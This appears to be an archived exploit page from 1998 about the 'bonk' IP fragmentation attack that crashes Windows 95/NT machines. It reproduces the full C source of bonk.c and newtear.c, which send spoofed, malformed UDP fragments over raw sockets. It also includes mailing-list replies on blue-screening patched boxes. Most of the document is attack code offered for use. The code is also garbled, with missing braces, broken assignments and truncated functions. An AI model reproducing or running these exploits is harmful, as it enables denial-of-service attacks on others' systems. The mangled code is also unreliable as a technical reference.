The "Bonk" NT/Win95 fragmentation attack

Description:In an attack that is basically the reverse of the teardrop attack, Windows machines that are patched for teardrop can be crashed.
Compromise:crash Windoze machines remotely
Vulnerable Systems:Windows 95, Windowsw NT
Date:5 January 1998

Date: Thu, 8 Jan 1998 15:17:11 -0600
From: Aleph One <aleph1@DFW.NET>
Subject: bonk.c

Goodies from


  [ ]

                                ==bendi - 1998==

                        bonk.c        -         5/01/1998
        Based On: teardrop.c by route|daemon9 & klepto
        Crashes *patched* win95/(NT?) machines.

        Basically, we set the frag offset > header length (teardrop
        reversed). There are many theories as to why this works,
        however i do not have the resources to perform extensive testing.
        I make no warranties. Use this code at your own risk.
        Rip it if you like, i've had my fun.


#include <stdio.h>
#include <string.h>

#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_udp.h>
#include <netinet/protocols.h>
#include <arpa/inet.h>

#define FRG_CONST       0x3
#define PADDING         0x1c

struct udp_pkt
        struct iphdr    ip;
        struct udphdr   udp;
        char data[PADDING];
} pkt;

int     udplen=sizeof(struct udphdr),
        iplen=sizeof(struct iphdr),
        psize=sizeof(struct udphdr)+sizeof(struct iphdr)+PADDING,
        spf_sck;                        /* Socket */

void usage(void)
        fprintf(stderr, "Usage: ./bonk <src_addr> <dst_addr> [num]\n");

u_long host_to_ip(char *host_name)
        static  u_long ip_bytes;
        struct hostent *res;

        res = gethostbyname(host_name);
        if (res == NULL)
                return (0);
        memcpy(&ip_bytes, res->h_addr, res->h_length);
        return (ip_bytes);

void quit(char *reason)

int fondle(int sck, u_long src_addr, u_long dst_addr, int src_prt,
           int dst_prt)
        int     bs;
        struct  sockaddr_in to;

        memset(&pkt, 0, psize);
                                                /* Fill in ip header */
        pkt.ip.version = 4;
        pkt.ip.ihl = 5;
        pkt.ip.tot_len = htons(udplen + iplen + PADDING); = htons(0x455);
        pkt.ip.ttl = 255;
        pkt.ip.protocol = IP_UDP;
        pkt.ip.saddr = src_addr;
        pkt.ip.daddr = dst_addr;
        pkt.ip.frag_off = htons(0x2000);        /* more to come */

        pkt.udp.source = htons(src_prt);        /* udp header */
        pkt.udp.dest = htons(dst_prt);
        pkt.udp.len = htons(8 + PADDING);
                                                /* send 1st frag */

        to.sin_family = AF_INET;
        to.sin_port = src_prt;
        to.sin_addr.s_addr = dst_addr;

        bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to,
                sizeof(struct sockaddr));

        pkt.ip.frag_off = htons(FRG_CONST + 1);         /* shinanigan */
        pkt.ip.tot_len = htons(iplen + FRG_CONST);
                                                        /* 2nd frag */

        bs = sendto(sck, &pkt, iplen + FRG_CONST + 1, 0,
                (struct sockaddr *) &to, sizeof(struct sockaddr));

        return bs;

void main(int argc, char *argv[])
        u_long  src_addr,

        int     i,
                bs = 1,
                pkt_count = 10;         /* Default amount */

        if (argc < 3)

        if (argc == 4)
                pkt_count = atoi(argv[3]);      /* 10 does the trick */

        /* Resolve hostnames */

        src_addr = host_to_ip(argv[1]);
        if (!src_addr)
                quit("bad source host");
        dst_addr = host_to_ip(argv[2]);
        if (!dst_addr)
                quit("bad target host");

        spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
        if (!spf_sck)
        if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *) &bs,
        sizeof(bs)) < 0)

        for (i = 0; i < pkt_count; ++i)
                fondle(spf_sck, src_addr, dst_addr, src_prt, dst_prt);


Date: Sat, 10 Jan 1998 22:19:09 -0500
From: Jord Sonneveld 
Subject: Re: bonk.c

Using boink.c (a modified bonk, available from,
I noticed that not all Win95/NT boxes come to a screeching halt.
Sometimes, 95 and NT time out for a while, mouse moves slow, etc. I have
only tested this on machines with ALL the latest patches applied. The
machines were pretty much identical and I do not know why some timed out
and some crashed with regular boink.

However, when I specified as the source address for the packet,
I got a very pretty blue screen in every case (which for me is five 95
boxes and four NT boxes).

My options for boink scanned between ports 1 and 27000, sending 1 packet.


Date: Thu, 8 Jan 1998 23:24:22 -0700
Subject: Source for NEWTEAR.C

Since the source for BORK.C has already been posted, and it is slightly
different from the source I used to find the exploit originally, and
because MANY people have mentioned that they would have wanted source to
test/verify this problem, I'm posting my source here as well just to
make sure that both issues are fully resolved.

For the record, Microsoft received this same source this morning at
about 2am.

 You must be ROOT on a unix machine to open raw sockets.

I don't know what one could do to protect against this, it uses
fragmented UDP packets sent to random ports.

Here it is...

Jiva DeVoe

Content-Type: text/plain; charset=us-ascii; name="newtear.c"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline; filename="newtear.c"

/*  Newtear.c
 *  Seemingly, a new teardrop type exploit. Affects NT4, and Win95.
 *  Discovered 01/08/1998
 *  Updated notes:
 *     This is a new version of teardrop.  It affects NT 4 and Win95 machines with all
 *     current patches and hotfixes.  Causes a bluescreen in both operating systems.
 *     Linux appears unaffected, other *NIXes untested.  Differences are:
 *     Smaller padding data size (20 bytes instead of 28 in previous teardrop)
 *     Faked out UDP total length.  (Increased reported UDP length to twice what it really is)
 *  Copyright (c) 1997 route|daemon9   11.3.97
 *  Linux/NT/95 Overlap frag bug exploit
 *  Exploits the overlapping IP fragment bug present in all Linux kernels and
 *  NT 4.0 / Windows 95 (others?)
 *  Based off of:   flip.c by klepto
 *  Compiles on:    Linux, *BSD*
 *  gcc -O2 teardrop.c -o teardrop
 *      OR
 *  gcc -O2 teardrop.c -o teardrop -DSTRANGE_BSD_BYTE_ORDERING_THING


                        /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n)  (n)
#else                   /* OpenBSD 2.1, all Linux */
#define FIX(n)  htons(n)

#define IP_MF   0x2000  /* More IP fragment en route */
#define IPH     0x14    /* IP header size */
#define UDPH    0x8     /* UDP header size */
#define PADDING 0x14    /* datagram frame padding for first packet */ /* JD Change pad size to 20 decimal. */
#define MAGIC   0x3     /* Magic Fragment Constant (tm).  Should be 2 or 3 */
#define COUNT   0x1     /* Linux dies with 1, NT is more stalwart and can
                         * withstand maybe 5 or 10 sometimes...  Experiment.
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);

int main(int argc, char **argv)
    int one = 1, count = 0, i, rip_sock;
    u_long  src_ip = 0, dst_ip = 0;
    u_short src_prt = 0, dst_prt = 0;
    struct in_addr addr;

    fprintf(stderr, "teardrop   route|daemon9\n\n");

    if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
        perror("raw socket");
    if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
        < 0)
    if (argc < 3) usage(argv[0]);
    if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
        fprintf(stderr, "What the hell kind of IP address is that?\n");

    while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
        switch (i)
            case 's':               /* source port (should be emphemeral) */
                src_prt = (u_short)atoi(optarg);
            case 't':               /* dest port (DNS, anyone?) */
                dst_prt = (u_short)atoi(optarg);
            case 'n':               /* number to send */
                count   = atoi(optarg);
            default :
                break;              /* NOTREACHED */
    if (!src_prt) src_prt = (random() % 0xffff);
    if (!dst_prt) dst_prt = (random() % 0xffff);
    if (!count)   count   = COUNT;

    fprintf(stderr, "Death on flaxen wings:\n");
    addr.s_addr = src_ip;
    fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
    addr.s_addr = dst_ip;
    fprintf(stderr, "  To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
    fprintf(stderr, " Amt: %5d\n", count);
    fprintf(stderr, "[ ");

    for (i = 0; i < count; i++)
        send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
        fprintf(stderr, "b00m ");
    fprintf(stderr, "]\n");
    return (0);

 *  Send two IP fragments with pathological offsets.  We use an implementation
 *  independent way of assembling network packets that does not rely on any of
 *  the diverse O/S specific nomenclature hinderances (well, linux vs. BSD).

void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
                u_short dst_prt)
    u_char *packet = NULL, *p_ptr = NULL;   /* packet pointers */
    u_char byte;                            /* a byte */
    struct sockaddr_in sin;                 /* socket protocol structure */

    sin.sin_family      = AF_INET;
    sin.sin_port        = src_prt;
    sin.sin_addr.s_addr = dst_ip;

     * Grab some memory for our packet, align p_ptr to point at the beginning
     * of our packet, and then fill it with zeros.
    packet = (u_char *)malloc(IPH + UDPH + PADDING);
    p_ptr  = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING); // Set it all to zero

    byte = 0x45;                        /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                         /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING);    /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);   /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) |= FIX(IP_MF);  /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;         /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                         /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;        /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;        /* IP destination address */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt);       /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);       /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + PADDING*2);   /* UDP total length */ /* Increases UDP total length to 48 bytes
                                                     Which is too big! */

    if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)

    /*  We set the fragment offset to be inside of the previous packet's
     *  payload (it overlaps inside the previous packet) but do not include
     *  enough payload to cover complete the datagram.  Just the header will
     *  do, but to crash NT/95 machines, a bit larger of packet seems to work
     *  better.
    p_ptr = &packet[2];         /* IP total length is 2 bytes into the header */
    *((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
    p_ptr += 4;                 /* IP offset is 6 bytes into the header */
    *((u_short *)p_ptr) = FIX(MAGIC);

    if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin,
                sizeof(struct sockaddr)) == -1)

u_long name_resolve(u_char *host_name)
    struct in_addr addr;
    struct hostent *host_ent;

    if ((addr.s_addr = inet_addr(host_name)) == -1)
        if (!(host_ent = gethostbyname(host_name))) return (0);
        bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
    return (addr.s_addr);

void usage(u_char *name)
            "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",

/* EOF */

More Exploits!

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Or you can pick your favorite operating system:
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